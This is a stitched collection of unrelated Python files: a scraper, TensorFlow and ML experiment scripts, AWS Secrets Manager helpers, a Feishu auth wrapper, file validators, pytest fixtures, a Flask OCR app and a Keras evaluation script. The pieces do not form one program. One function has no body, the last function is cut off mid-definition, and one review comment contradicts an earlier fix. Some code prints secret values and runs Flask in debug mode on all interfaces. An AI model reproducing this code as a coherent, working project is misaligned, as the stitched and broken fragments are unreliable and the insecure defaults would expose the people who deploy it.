def getHtml(url, cookie, origin):
    """GET *url* with the given session cookie and return the decoded body.

    *origin* is accepted for interface compatibility but currently unused
    (the Origin header line is kept commented out, as in the original).
    Raises requests.HTTPError on a non-2xx response.
    """
    headers = {
        "Cookie": cookie,
        # "Origin": origin,
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36",
    }
    response = requests.get(url, timeout=40, headers=headers, stream=True)
    response.raise_for_status()
    response.encoding = response.apparent_encoding
    return response.text
def getAbstract(links, cookie, url):
    """Fetch every detail page in *links* and return a list of cleaned
    abstract strings (CR/LF and spaces stripped, leading label removed).

    Each page is retried up to 50 times; if one link exhausts its retries,
    the remaining links are skipped (as in the original behavior).
    """
    abstracts = []
    for link in links:
        # BUG fix: the attempt counter was shared across all links, so after
        # 50 failures in total (across different links) no link was retried
        # anymore. Reset it per link instead.
        attempts = 0
        success = False
        while attempts < 50 and not success:
            try:
                resp = getHtml(link, cookie, url)
                soup = BeautifulSoup(resp, 'html.parser')
                # [6:] drops the leading "摘要：" label of the abstract div.
                abstract = soup.find('div', style='text-align:left;word-break:break-all').get_text()[6:]
                abstract = abstract.replace('\r', '')
                abstract = abstract.replace('\n', '')
                abstract = abstract.replace(' ', '')
                abstracts.append(abstract)
                socket.setdefaulttimeout(10)
                success = True
            except Exception:
                # Narrowed from a bare except so Ctrl-C still interrupts.
                attempts += 1
                print("link第" + str(attempts) + "次重试!!")
        if attempts == 50:
            # Give up entirely once a single link has failed 50 times.
            break
    return abstracts
def getCiyun():
    """Placeholder for word-cloud ("ciyun") generation; not implemented."""
    pass
'''
Created on 11 set 2017
@author: davide
'''
'''
Loop example
'''
# Loop example
import tensorflow as tf
# TF1-style example: initialize a variable and print successive increments.
x = tf.Variable(0, name = 'x')
model = tf.global_variables_initializer()  # init op for all variables
print(model)
with tf.Session() as session:
    session.run(model)
    for i in range(5):
        # NOTE(review): rebinding x to `x + 1` creates a new add op in the
        # graph each iteration (x is no longer the Variable afterwards);
        # prints 1..5 as each new op is evaluated.
        x = x + 1
        print(session.run(x))
def vegalite_piechart(n_pass, n_fail):
    """Build a Vega-Lite v4 arc ("pie") chart spec for pass/fail counts.

    Returns a plain dict ready for JSON serialization, with one wedge per
    category ("pass" and "fail") sized by the given counts.
    """
    values = [
        {"category": "pass", "value": n_pass},
        {"category": "fail", "value": n_fail},
    ]
    return {
        "$schema": "https://vega.github.io/schema/vega-lite/v4.json",
        "description": "A simple pie chart showing the ratio of passed and failed tests.",
        "data": {"values": values},
        "mark": "arc",
        "encoding": {
            "theta": {"field": "value", "type": "quantitative"},
            "color": {"field": "category", "type": "nominal"},
        },
    }
import boto3
import base64
import os
import yaml
import json
from botocore.exceptions import ClientError
# Module-level boto3 session/client shared by every helper below; region
# and credentials come from the default boto3 resolution chain.
session = boto3.session.Session()

# Create a Secrets Manager client
client = session.client(
    service_name='secretsmanager'
)
def __accountIds():
    """Return the shared account IDs.

    Prefers the 'SharedAccounts' list from ./config.yaml (relative to the
    current working directory); falls back to the SHARED_ACCOUNTIDS
    environment variable, and exits the process when neither is present.
    """
    if os.path.isfile('config.yaml'):
        with open('config.yaml') as f:
            config = yaml.safe_load(f.read())
        return config['SharedAccounts']
    # BUG fix: os.environ['SHARED_ACCOUNTIDS'] raised KeyError when unset,
    # so the "no config" message and exit() below were unreachable.
    AccountIds = os.environ.get('SHARED_ACCOUNTIDS')
    if AccountIds is None:
        print('No config or environment variables present, exiting')
        exit()
    return AccountIds
def __environmentTags():
    """Return the pipeline tags as [Portfolio, App, Branch].

    Reads ./config.yaml when present, otherwise the PIPELINE_* environment
    variables; exits the process when neither source is available.
    """
    if os.path.isfile('config.yaml'):
        with open('config.yaml') as f:
            config = yaml.safe_load(f.read())
        configTags = config['Pipeline']
        # BUG fix: this branch returned (tags, AccountIds) while the env-var
        # branch returned only tags, so callers such as put() that index
        # tags[0..2] got the wrong values when config.yaml existed. Both
        # branches now return just the tag list (use __accountIds() for the
        # shared account IDs).
        return [configTags['Portfolio'], configTags['App'], configTags['Branch']]
    # BUG fix: os.environ['PIPELINE_PORTFOLIO'] raised KeyError when unset,
    # so the "no config" message and exit() were unreachable.
    portfolio = os.environ.get('PIPELINE_PORTFOLIO')
    if portfolio is None:
        print('No config or environment variables present, exiting')
        exit()
    return [portfolio, os.environ['PIPELINE_APP'], os.environ['PIPELINE_BRANCH_SHORT_NAME']]
def __errorHandler(e):
    """Print a human-readable explanation for known Secrets Manager
    ClientError codes and re-raise the error.

    Unknown error codes fall through silently (no print, no raise), as in
    the original implementation.
    """
    explanations = {
        'EncryptionFailureException':
            'Failed to encrypt or decrypt the secret, are you sure you have sufficent KMS privileges?',
        'InternalServiceErrorException':
            '500 Error for the internal service - see raised error below',
        'InvalidParameterException':
            'You have used a invalid paramater and thus, the service has thrown an exception - see raised error below',
        'InvalidRequestException':
            'You have asked the service to do something and it does not understand the request, marking it invalid - see error raised below',
        'ResourceNotFoundException':
            'You have asked the secret service for a secret that does not exist or that this role does not have permission to access',
    }
    message = explanations.get(e.response['Error']['Code'])
    if message is not None:
        print(message)
        raise e
def __sharedSecretPolicy(name, accounts=None):
    """Attach a resource policy to secret *name* that allows
    secretsmanager:GetSecretValue (AWSCURRENT stage only) from the root
    principal of each account in *accounts*. Returns the secret's ARN.
    """
    # BUG fix: the default was a mutable list (accounts=[]), which is shared
    # across calls; use None as the sentinel instead.
    if accounts is None:
        accounts = []
    accountArns = ["arn:aws:iam::{id}:root".format(id=account)
                   for account in accounts]
    resourcePolicyJson = {
        "Version": "2012-10-17",
        "Statement": [
            {
                "Effect": "Allow",
                "Principal": {"AWS": accountArns},
                "Action": "secretsmanager:GetSecretValue",
                "Resource": "*",
                "Condition": {"ForAnyValue:StringEquals": {"secretsmanager:VersionStage": "AWSCURRENT"}}
            }
        ]
    }
    # BUG fix: put_resource_policy expects ResourcePolicy as a JSON *string*;
    # passing the dict raised a parameter validation error.
    response = client.put_resource_policy(
        SecretId=name,
        ResourcePolicy=json.dumps(resourcePolicyJson)
    )
    return response['ARN']
def __generatePassword():
    """Ask Secrets Manager for a 64-character random password.

    Excludes easily-confused / shell-hostile characters (|iIlL<:`'") but
    otherwise allows all character classes, with no per-class requirement.
    """
    response = client.get_random_password(
        PasswordLength=64,
        ExcludeCharacters='|iIlL<:`\'"',
        ExcludeNumbers=False,
        ExcludePunctuation=False,
        ExcludeUppercase=False,
        ExcludeLowercase=False,
        IncludeSpace=False,
        RequireEachIncludedType=False
    )
    return response['RandomPassword']
def __checkSecret(Name):
    """Return True (and print the name) when the secret *Name* exists.

    NOTE(review): on ClientError, __errorHandler re-raises for known error
    codes; for unknown codes this function falls through and implicitly
    returns None rather than False — treat the result as truthy/falsy only.
    """
    try:
        describe_secret = client.describe_secret(
            SecretId=Name
        )
    except ClientError as e:
        __errorHandler(e)
    else:
        print(describe_secret['Name'])
        return True
def update(Name, Value=None, Description='', kmsKeyId=''):
    """Update an existing secret's value and return the secret's name.

    When *Value* is None a random password is generated and the
    Description is also updated; when *Value* is given, only the value
    (and KMS key) are updated, preserving the original behavior of not
    touching the description. Returns None when a ClientError was handled
    without re-raising.
    """
    if Value is None:
        Value = __generatePassword()
        try:
            update_secret_response = client.update_secret(
                SecretId=Name,
                SecretString=Value,
                Description=Description,
                KmsKeyId=kmsKeyId
            )
        except ClientError as e:
            __errorHandler(e)
        else:
            secret = update_secret_response['Name']
            return secret
    else:
        try:
            update_secret_response = client.update_secret(
                SecretId=Name,
                SecretString=Value,
                KmsKeyId=kmsKeyId
            )
        except ClientError as e:
            __errorHandler(e)
        else:
            secret = update_secret_response['Name']
            # BUG fix: this branch computed the updated secret's name but
            # never returned it, so callers always got None when they
            # supplied an explicit Value.
            return secret
def get(Name):
    """Fetch a secret by name/ARN.

    Returns the SecretString, or the base64-decoded SecretBinary for
    binary secrets; returns False when a ClientError was handled.
    """
    try:
        get_secret_value_response = client.get_secret_value(
            SecretId=Name
        )
    except ClientError as e:
        __errorHandler(e)
        return False
    else:
        if 'SecretString' in get_secret_value_response:
            secret = get_secret_value_response['SecretString']
            # NOTE(review): printing secret material to stdout can leak it
            # into CI logs — consider removing these prints.
            print(secret)
            return secret
        else:
            decoded_binary_secret = base64.b64decode(get_secret_value_response['SecretBinary'])
            print(decoded_binary_secret)
            return decoded_binary_secret
def put(Name, Description='', Value='', kmsKeyId='', shared=False):
    """Create a secret named {Portfolio}_{App}_{Branch}_{Name}, tagged
    with the pipeline metadata; optionally attach a cross-account share
    policy. Returns the created secret's name (None if a ClientError was
    handled).

    NOTE(review): __environmentTags() returns (tags, AccountIds) when
    config.yaml exists but just the tag list otherwise; the tags[0..2]
    indexing below assumes the latter shape — verify with a config file
    present.
    """
    try:
        tags = __environmentTags()
        secretName = "{Portfolio}_{App}_{Branch}_{Name}".format(Portfolio=tags[0],
                                                                App=tags[1],
                                                                Branch=tags[2],
                                                                Name=Name)
        put_secret_value_response = client.create_secret(
            Name=secretName,
            Description=Description,
            KmsKeyId=kmsKeyId,
            SecretString=Value,
            Tags=[
                {
                    'Key': 'Portfolio',
                    'Value': tags[0]
                },
                {
                    'Key': 'App',
                    'Value': tags[1]
                },
                {
                    'Key': 'Branch',
                    'Value': tags[2]
                }
            ]
        )
    except ClientError as e:
        __errorHandler(e)
    else:
        secret = put_secret_value_response['Name']
        if shared is True:
            # Share the new secret with the configured account IDs.
            __sharedSecretPolicy(name=secret, accounts=__accountIds())
        return secret
def delete(Name):
    """Schedule deletion of the secret *Name* (30-day recovery window)
    and return its name, or None when a ClientError was handled.
    """
    try:
        delete_secret_response = client.delete_secret(
            SecretId=Name,
            # BUG fix: AWS only accepts RecoveryWindowInDays in the range
            # 7-30 (120 was rejected), and it may not be combined with an
            # explicit ForceDeleteWithoutRecovery parameter.
            RecoveryWindowInDays=30
        )
    except ClientError as e:
        __errorHandler(e)
    else:
        # BUG fix: the DeleteSecret response contains 'ARN', 'Name' and
        # 'DeletionDate' — there is no 'SecretId' key, so the old lookup
        # raised KeyError on success.
        secret = delete_secret_response['Name']
        return secret
|
# -*- coding: utf-8 -*-
from .app_access_token import AppAccessToken, final_app_access_token
class Authen(AppAccessToken):
    """Feishu (Lark) authentication helper for exchanging a login code
    for the logged-in user's identity."""
    def __init__(self, appid=None, secret=None, ticket=None, tenant_key=None, token=None, storage=None):
        super(Authen, self).__init__(appid=appid, secret=secret, ticket=ticket, tenant_key=tenant_key, token=token, storage=storage)
        # Get the logged-in user's identity.
        # Refer: https://open.feishu.cn/document/ukTMukTMukTM/uEDO4UjLxgDO14SM4gTN
        self.AUTHEN_V1_ACCESS_TOKEN = self.OPEN_DOMAIN + '/open-apis/authen/v1/access_token'

    def get_userinfo(self, code=None, grant_type='authorization_code', appid=None, secret=None, ticket=None, token=None, storage=None):
        """Exchange the OAuth *code* for user info; returns the 'data'
        dict of the API response (empty dict when absent).
        update_params/post/final_app_access_token come from AppAccessToken.
        """
        # Update params
        self.update_params(appid=appid, secret=secret, ticket=ticket, storage=storage)
        # Token
        token = final_app_access_token(self, appid=appid, secret=secret, ticket=ticket, token=token, storage=storage)
        return self.post(self.AUTHEN_V1_ACCESS_TOKEN, data={
            'app_access_token': token,
            'grant_type': grant_type,
            'code': code,
        }).get('data', {})
# Module-level singleton plus aliases so callers can use get_userinfo(...)
# without constructing an Authen themselves.
authen = Authen()
get_userinfo = authen.get_userinfo
authen_get_userinfo = authen.get_userinfo
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Jun 8 19:45:15 2021
@author: dankovacevich
"""
from zipfile import ZipFile
import re
import py_compile
import os
import sys
import PyPDF2
import imghdr
import subprocess
#-----------list of condition names-----------
# Regex patterns for matching file extensions.
# BUG fix: the f-string prefixes did nothing (no placeholders), and the
# unescaped '.' before the extension matched ANY character (e.g. "axpy"
# matched the .py pattern). Raw strings with escaped dots; the capture
# groups are kept for any callers using .group(1).
pythonFile = r".*(\.py)$"
pdfFile = r"(\.pdf)$"
pngFile = r"(\.png)$"
def UnixFileType(filename):
    """Return the MIME type of *filename* (e.g. 'text/plain') as reported
    by the Unix `file` utility; requires `file` on PATH."""
    raw = subprocess.check_output(["file", "--mime-type", "-b", filename])
    return raw.decode().rstrip()
#----------Test For Readable Text File------------
def ReadableTextFile(filename):
    """Return 'correct' when `file` reports *filename* as text/plain,
    otherwise "Not a valid .txt file".
    Flattened from the original zero-argument factory (which closed over
    nothing); the module-level name is still a filename -> str callable.
    """
    try:
        if UnixFileType(filename) == "text/plain":
            return 'correct'
    except:
        pass
    return "Not a valid .txt file"
#----------Test For Readable PDF File------------
def ReadablePDFFile(filename):
    """Return 'correct' when `file` reports *filename* as application/pdf,
    otherwise "Not a valid .pdf file".
    Flattened from the original zero-argument factory; same interface.
    """
    try:
        if UnixFileType(filename) == "application/pdf":
            return 'correct'
    except:
        pass
    return "Not a valid .pdf file"
#----------Test For Readable JPEG File------------
def ReadableJPEGFile(filename):
    """Return 'correct' when `file` reports *filename* as image/jpeg,
    otherwise "Not a valid JPEG file".
    Flattened from the original zero-argument factory; same interface.
    """
    try:
        if UnixFileType(filename) == "image/jpeg":
            return 'correct'
    except:
        pass
    return "Not a valid JPEG file"
#----------Test For Readable PNG File------------
def ReadablePNGFile(filename):
    """Return 'correct' when `file` reports *filename* as image/png,
    otherwise "Not a valid png file".
    Flattened from the zero-argument factory; also removed an unreachable
    trailing `return 'correct'` (every path of the try/except already
    returned), which made this checker inconsistent with its siblings.
    """
    try:
        if UnixFileType(filename) == "image/png":
            return 'correct'
        return "Not a valid png file"
    except:
        return "Not a valid png file"
#----------Test For Readable MSWORD File------------
def ReadableMSWORDFile(filename):
    """Return 'correct' when `file` reports *filename* as a legacy or
    OOXML Word document, otherwise "Not a valid MS word document".
    Flattened from the original zero-argument factory; same interface.
    """
    word_types = ("application/msword",
                  "application/vnd.openxmlformats-officedocument.wordprocessingml.document")
    try:
        if UnixFileType(filename) in word_types:
            return 'correct'
    except:
        pass
    return "Not a valid MS word document"
#----------Test For Readable EXCEL File------------
def ReadableEXCELFile(filename):
    """Return 'correct' when `file` reports *filename* as a legacy or
    OOXML Excel workbook, otherwise "Not a valid MS Excel file".
    Flattened from the original zero-argument factory; same interface.
    """
    excel_types = ("application/vnd.ms-excel",
                   "application/vnd.openxmlformats-officedocument.spreadsheetml.sheet")
    try:
        if UnixFileType(filename) in excel_types:
            return 'correct'
    except:
        pass
    return "Not a valid MS Excel file"
#----------Test For Readable PPT File------------
def ReadablePPTFile(filename):
    """Return 'correct' when `file` reports *filename* as a legacy or
    OOXML PowerPoint presentation, otherwise "Not a valid MS PPT file".
    Flattened from the original zero-argument factory; same interface.
    """
    ppt_types = ("application/vnd.ms-powerpoint",
                 "application/vnd.openxmlformats-officedocument.presentationml.presentation")
    try:
        if UnixFileType(filename) in ppt_types:
            return 'correct'
    except:
        pass
    return "Not a valid MS PPT file"
#----------Test For Readable HTML File------------
def ReadableHTMLFile(filename):
    """Return 'correct' if *filename* is a readable HTML file, else an error string."""
    try:
        if UnixFileType(filename) == "text/html":
            return 'correct'
        return "Not a valid html file"
    except Exception:
        return "Not a valid html file"
#----------Test For Readable CSS File------------
def ReadableCSSFile(filename):
    """Return 'correct' if *filename* is a readable CSS file, else an error string."""
    try:
        if UnixFileType(filename) == "text/css":
            return 'correct'
        return "Not a valid css file"
    except Exception:
        return "Not a valid css file"
#----------Test For Readable CSV File------------
def ReadableCSVFile(filename):
    """Return 'correct' if *filename* is a readable CSV file, else an error string."""
    try:
        if UnixFileType(filename) == "text/csv":
            return 'correct'
        return "Not a valid csv file"
    except Exception:
        return "Not a valid csv file"
#--------------Test for Max Pages-----------------
def PDFMaxPages(num):
    """Build a validator rejecting PDFs with more than *num* pages.

    The returned callable yields 'correct', an over-limit message, or
    'Failed to Open File' when the PDF cannot be read at all.
    """
    def pdfpages(filename):
        try:
            page_count = PyPDF2.PdfFileReader(filename).getNumPages()
            if page_count <= num:
                return 'correct'
            overage = page_count - num
            return 'Over Max (' + str(num) + ') Pages By ' + str(overage)
        except:
            return 'Failed to Open File'
    return pdfpages
#---------------Test For Compilation------------------
def PythonThatCompiles(filename):
    """Return 'correct' if *filename* byte-compiles as Python, else 'Failed Compile Check'.

    Flattened from a needless factory-and-self-call pattern; the bare
    `except:` was narrowed to `except Exception` (still covers
    PyCompileError and OSError from unreadable files).
    """
    try:
        py_compile.compile(filename, doraise=True)
    except Exception:
        return 'Failed Compile Check'
    return 'correct'
#-------------Checks Specific Condition-----------
def checkcondition(zipfile, filename, requirement):
    """Extract *filename* from the archive *zipfile*, then apply *requirement* to it.

    *requirement* is one of the validator callables above; its status string
    is returned unchanged.  Extraction goes to the current working directory.
    """
    with ZipFile(zipfile, 'r') as archive:
        archive.extract(filename)
        return requirement(filename)
|
# coding: utf8
"""
File to run real data experiments.
"""
import json
import os
import sys
import time
import numpy as np
import sklearn
from sklearn.metrics import mean_squared_error
from sklearn.metrics.pairwise import pairwise_distances
from sklearn.model_selection import GridSearchCV as GSCV
from sklearn.model_selection import KFold, ShuffleSplit
from utils import load_data_set, load_estimator
# Relative path leading to the repositories "github.com/soply/db_hand",
# "github.com/soply/simple_estimation", "github.com/soply/nsim_algorithm",
# "github.com/dclambert/Python-ELM"
# Adjust this if those sibling repositories are checked out elsewhere.
path_to_source = '../..'
def run_experiment(arguments):
    """Run a cross-validated regression experiment and persist the results.

    arguments: dict with keys 'dataset', 'estimator_kwargs', 'n_test_sets',
        'test_size', 'param_grid', 'cv_folds', 'n_jobs', 'filename'.
    For each of n_test_sets random train/test splits, the estimator's
    hyperparameters are chosen by grid-search CV on the training part and
    the RMSE on the test part is recorded.  All outputs are written under
    '../results/<filename>[_k]/' (a fresh, non-clashing directory).

    FIX: the two Python-2 `print` statements were converted to print()
    calls so the module parses under Python 3 as well.
    """
    # Load data set and estimator via the project-local helpers in utils.py
    X, Y, log_tf = load_data_set(arguments['dataset'], path_to_source)
    estim = load_estimator(arguments['estimator_kwargs'], path_to_source)
    # Prepare for experiments
    n_test_sets = arguments['n_test_sets']
    test_size = arguments['test_size']
    param_grid = arguments['param_grid']  # Parameter grid for estimator to CV over
    cv_folds = arguments['cv_folds']
    n_jobs = arguments['n_jobs']
    kf = ShuffleSplit(n_splits = n_test_sets, test_size = test_size)
    test_error = np.zeros(n_test_sets)
    best_parameters = {}
    test_iter = 0
    computational_time = np.zeros(n_test_sets)
    # Extra array to store dot products if estimator is nsim
    almost_linearity_param = np.zeros(n_test_sets)
    for idx_train, idx_test in kf.split(X):
        start = time.time()
        reg = GSCV(estimator = estim, param_grid = param_grid,
                   scoring = 'neg_mean_squared_error', iid = False,
                   cv = cv_folds, verbose = 0,
                   pre_dispatch = n_jobs,
                   error_score = np.nan,  # if estimator fitting raises an exception
                   refit = True)
        X_train, Y_train = X[idx_train,:], Y[idx_train]
        X_test, Y_test = X[idx_test,:], Y[idx_test]
        reg = reg.fit(X_train, Y_train)
        Y_predict = reg.best_estimator_.predict(X_test)
        end = time.time()
        best_parameters[test_iter] = reg.best_params_
        if arguments['estimator_kwargs']['estimator'] in ['isotron', 'slisotron']:
            # These estimators choose their iteration count internally.
            best_parameters[test_iter] = reg.best_estimator_.n_iter_cv()
        if log_tf:
            # Undo the log transform before computing the RMSE.
            test_error[test_iter] = np.sqrt(mean_squared_error(np.exp(Y_test), np.exp(Y_predict)))
        else:
            test_error[test_iter] = np.sqrt(mean_squared_error(Y_test, Y_predict))
        computational_time[test_iter] = end - start
        if arguments['estimator_kwargs']['estimator'] == 'nsim':
            almost_linearity_param[test_iter] = reg.best_estimator_.measure_almost_linearity()
        test_iter += 1
    print(best_parameters)
    print(test_error)
    # Save results under a directory name that does not clash with earlier runs
    mean_error = np.mean(test_error)
    std_error = np.std(test_error)
    mean_computational_time = np.mean(computational_time)
    mean_almost_linearity_param = np.mean(almost_linearity_param)
    filename = arguments['filename']
    filename_mod = filename
    save_itr = 0
    while os.path.exists('../results/' + filename_mod + '/'):
        save_itr += 1
        filename_mod = filename + '_' + str(save_itr)
    os.makedirs('../results/' + filename_mod + '/')
    np.save('../results/' + filename_mod + '/test_errors.npy', test_error)
    np.savetxt('../results/' + filename_mod + '/test_errors.txt', test_error)
    np.savetxt('../results/' + filename_mod + '/computational_time.txt', computational_time)
    np.savetxt('../results/' + filename_mod + '/computational_time_summary.txt', [mean_computational_time])
    np.savetxt('../results/' + filename_mod + '/test_errors_summary.txt', np.array([mean_error, std_error]))
    np.save('../results/' + filename_mod + '/best_params.npy', best_parameters)
    if arguments['estimator_kwargs']['estimator'] == 'nsim':
        np.savetxt('../results/' + filename_mod + '/almost_linearity_param.txt', almost_linearity_param)
        np.savetxt('../results/' + filename_mod + '/almost_linearity_summary.txt', [mean_almost_linearity_param])
    with open('../results/' + filename_mod + '/best_params_json.txt', 'w') as file:
        file.write(json.dumps(best_parameters, indent=4))
    with open('../results/' + filename_mod + '/log.txt', 'w') as file:
        file.write(json.dumps(arguments, indent=4))
if __name__ == '__main__':
    # Get number of jobs from sys.argv
    if len(sys.argv) > 1:
        n_jobs = int(sys.argv[1])
    else:
        n_jobs = 1  # Default 1 jobs
    # print() call form works under both Python 2 and 3 (was a py2 print statement)
    print('Using n_jobs = {0}'.format(n_jobs))
    # Experiment configuration for a single run on the auto_mpg data set.
    arguments = {
        'filename' : 'Auto_FFNN_Sigmoid', # Name to store results
        'dataset' : 'auto_mpg', # Data set identifier
        'n_jobs' : n_jobs, # number of jobs to run in cv mode
        'n_test_sets' : 30, # number of repititions of the experiment
        'test_size' : 0.15, # size of the test set
        'cv_folds' : 5, # CV is used for parameter choices
        'estimator_kwargs' : { # Estimator details, content depends on the estimator
            'estimator' : 'ffnn',
            'general_options' : {
                'learning_rate' : 0.01,
                'n_iter' : 10000,
                'valid_size' : 0.1,
                }
            # 'qp_solver' : None
            },
        'param_grid' : {
            'n_hidden' : np.arange(2,20).tolist()
            }
        }
    run_experiment(arguments)
|
import os
import random
from functools import partial
import numpy
import pytest
# Absolute tolerance used for float comparisons throughout this test suite.
FLOAT_EQUALITY_ACCURACY = 0.001
# Monkey-patch pytest.approx so every approx() call defaults to that tolerance.
pytest.approx = partial(pytest.approx, abs=FLOAT_EQUALITY_ACCURACY)
@pytest.fixture
def random_seed():
    """Seed both the stdlib and numpy RNGs with a fresh random seed.

    The chosen seed is printed so a failing run can be reproduced.
    """
    # TODO: change scope to module and reset it in test dropdown, tearup
    chosen = random.randint(0, 10000)
    random.seed(chosen)
    numpy.random.seed(chosen)
    print("random seed:", chosen, end=" ")
@pytest.fixture(scope='module')
def base_data_path():
    """Return the absolute tests/test_data_files directory, with a trailing separator."""
    script_dir = os.path.dirname(
        os.path.realpath(os.path.join(os.getcwd(), os.path.expanduser(__file__))))
    base = os.path.normpath(script_dir)
    return os.path.join(base, "tests", "test_data_files") + os.sep
|
from flask import Flask, request, render_template
import json
import boto3
from werkzeug.utils import secure_filename
# SECURITY FIX: the original code embedded long-term AWS access keys, a secret
# key and a session token directly in source.  Committed credentials must be
# considered compromised and revoked.  Rely on boto3's default credential
# provider chain instead (environment variables AWS_ACCESS_KEY_ID /
# AWS_SECRET_ACCESS_KEY, the shared ~/.aws/credentials file, or an IAM role).
textractclient = boto3.client("textract", region_name="us-east-2")
s3 = boto3.client('s3')
app = Flask(__name__)
@app.route("/", methods=["GET"])
def main():
    """Landing page, rendered with an empty OCR payload."""
    empty_payload = json.dumps({})
    return render_template("index.html", jsonData=empty_payload)
@app.route("/english", methods=["GET"])
def english():
    """English-language page, rendered with an empty OCR payload."""
    empty_payload = json.dumps({})
    return render_template("english.html", jsonData=empty_payload)
@app.route("/italiana", methods=["GET"])
def italiana():
    """Italian-language page, rendered with an empty OCR payload."""
    empty_payload = json.dumps({})
    return render_template("italiana.html", jsonData=empty_payload)
@app.route("/german", methods=["GET"])
def german():
    """German-language page, rendered with an empty OCR payload."""
    empty_payload = json.dumps({})
    return render_template("german.html", jsonData=empty_payload)
@app.route("/espanol", methods=["GET"])
def espanol():
    """Spanish-language page, rendered with an empty OCR payload."""
    empty_payload = json.dumps({})
    return render_template("spanish.html", jsonData=empty_payload)
@app.route("/french", methods=["GET"])
def french():
    """French-language page, rendered with an empty OCR payload."""
    empty_payload = json.dumps({})
    return render_template("french.html", jsonData=empty_payload)
@app.route("/portugese", methods=["GET"])
def portugese():
    """Portuguese-language page, rendered with an empty OCR payload."""
    empty_payload = json.dumps({})
    return render_template("portuguese.html", jsonData=empty_payload)
@app.route("/extract", methods=["POST"])
def extractImage():
    """Run Textract OCR on the uploaded file and render the detected text."""
    uploaded = request.files.get("filename")
    response = textractclient.detect_document_text(
        Document={
            'Bytes': uploaded.read()
        }
    )
    # Join every detected LINE block, each followed by a single space.
    extractedText = "".join(
        block["Text"] + " "
        for block in response['Blocks']
        if block["BlockType"] == "LINE"
    )
    responseJson = {
        "text": extractedText
    }
    print(responseJson)
    return render_template("english.html", jsonData=json.dumps(responseJson))
BUCKET_NAME = 'easyextractwebsite'
@app.route('/upload', methods=['post'])
def upload():
    """Save the posted file locally, then push it to the S3 bucket.

    NOTE(review): if no file is posted, `msg` is never assigned and the
    final return raises NameError -- behavior kept as in the original.
    """
    if request.method == 'POST':
        posted = request.files['file']
        if posted:
            safe_name = secure_filename(posted.filename)
            posted.save(safe_name)
            s3.upload_file(
                Bucket=BUCKET_NAME,
                Filename=safe_name,
                Key=safe_name,
            )
            msg = "Upload Done ! "
    return render_template("index.html", msg=msg)
app.run("0.0.0.0", port=5000, debug=True) |
import pandas as pd
import sys
import os
import matplotlib.pyplot as plt
import seaborn as sns
# Shared seaborn palette for all plots produced in this module.
pal = sns.color_palette()
# Make the project root importable so the greyatomlib package resolves.
sys.path.append(os.path.dirname(os.path.dirname(os.path.dirname(__file__))))
from greyatomlib.quora_project.q01_load_data_questions.build import q01_load_data_questions
# 'agg' backend renders without a display (safe on headless CI machines).
plt.switch_backend('agg')
# Relative path to the Quora question-pairs training data.
path = 'data/train.csv'
def q02_len_questions_1():
|
#ht_test_data prediction
import os
import numpy as np
import csv
import pandas as pd
from keras.preprocessing.text import Tokenizer
from keras.preprocessing.sequence import pad_sequences
from keras.models import Model,load_model
from keras.utils import to_categorical
from keras.layers import Activation, Dense, Dropout,Input,Add,concatenate
from sklearn.preprocessing import LabelBinarizer
from sklearn.model_selection import train_test_split,StratifiedKFold
from keras.layers import Conv1D,MaxPooling1D,Embedding,GlobalMaxPooling1D
from keras.initializers import Constant
from sklearn.metrics import accuracy_score,classification_report,confusion_matrix,precision_score,recall_score,f1_score
import pickle
#hyperparameters
vocab_size = 30000
batch_size = 128
embedding_dim = 300
max_len = 3000
# content/drive/My Drive/ML_Datasets/genData/test_data.pickle
#loading the pickled test data file
# SECURITY NOTE: pickle.load executes arbitrary code; only load trusted files.
pickle_in = open("ht_test_text.pickle","rb")
X = pickle.load(pickle_in)
pickle_in = open("ht_test_data.pickle","rb")
data = pickle.load(pickle_in)
#loading the pickled tokenizer
pickle_in = open("tokenizer.pickle","rb")
tokenizer = pickle.load(pickle_in)
# tokenizer = Tokenizer(num_words = vocab_size)
# tokenizer.fit_on_texts(X)
# word_index = tokenizer.word_index
#tokenizing the text data
train_sentences_tokenized = tokenizer.texts_to_sequences(X)
#padding the sequences (every sample becomes a fixed-length vector of max_len)
X = pad_sequences(train_sentences_tokenized, maxlen=max_len)
# Binary labels: each trait column of `data` holds 'y' or 'n'.
tags = ['y','n']
label_enc = LabelBinarizer()
label_enc.fit(tags)
Y_1 = label_enc.transform(data['cSIN'])
Y_1 = to_categorical(Y_1)
Y_2 = label_enc.transform(data['cEXC'])
Y_2 = to_categorical(Y_2)
Y_3 = label_enc.transform(data['cCOM'])
Y_3 = to_categorical(Y_3)
Y_4 = label_enc.transform(data['cRUG'])
Y_4 = to_categorical(Y_4)
Y_5 = label_enc.transform(data['cSOP'])
Y_5 = to_categorical(Y_5)
#concatenating the binary laabels to for n_data_samples*10 (2 for each label [y or n])
# Column order of Y is therefore: cSIN, cEXC, cCOM, cRUG, cSOP (2 columns each).
Y = np.concatenate((Y_1,Y_2,Y_3,Y_4,Y_5),axis=1)
print(Y.shape)
# 'cSIN','cEXC','cCOM','cRUG','cSOP'
#performing he seven fold validation
kfold = StratifiedKFold(n_splits=7, shuffle=True, random_state=4991)
#list to store the accuracy, precision, recall score and f1-score for the 7-fold validation
# Suffix convention: 1=cSIN, 2=cEXC, 3=cCOM, 4=cSOP, 5=cRUG (note 4/5 swap vs. Y order).
acscores1 = []
acscores2 = []
acscores3 = []
acscores4 = []
acscores5 = []
prescores1 = []
prescores2 = []
prescores3 = []
prescores4 = []
prescores5 = []
rescores1 = []
rescores2 = []
rescores3 = []
rescores4 = []
rescores5 = []
fscores1 = []
fscores2 = []
fscores3 = []
fscores4 = []
fscores5 = []
#loading the trained models (one Keras model per personality trait)
model1 = load_model('my_model_cSIN_tag')
model2 = load_model('my_model_cEXC_tag')
model3 = load_model('my_model_cCOM_tag')
model4 = load_model('my_model_cSOP_tag')
model5 = load_model('my_model_cRUG_tag')
#performing the 7-fold validation for all the personality traits
def _evaluate_trait(model, col_lo, col_hi, title, acscores, prescores, rescores, fscores):
    """Evaluate *model* over the 7 stratified folds for label columns
    Y[:, col_lo:col_hi], printing the confusion matrix, accuracy and
    classification report per fold and appending accuracy / precision /
    recall / f1 to the given accumulator lists.

    Replaces five copy-pasted 16-line loops; the printed output is
    identical to the original, fold for fold.
    """
    print(title)
    for train, test in kfold.split(X, Y[:, col_lo:col_hi].argmax(axis=1)):
        pred = model.predict(X[test]).argmax(axis=1)
        truth = Y[test, col_lo:col_hi].argmax(axis=1)
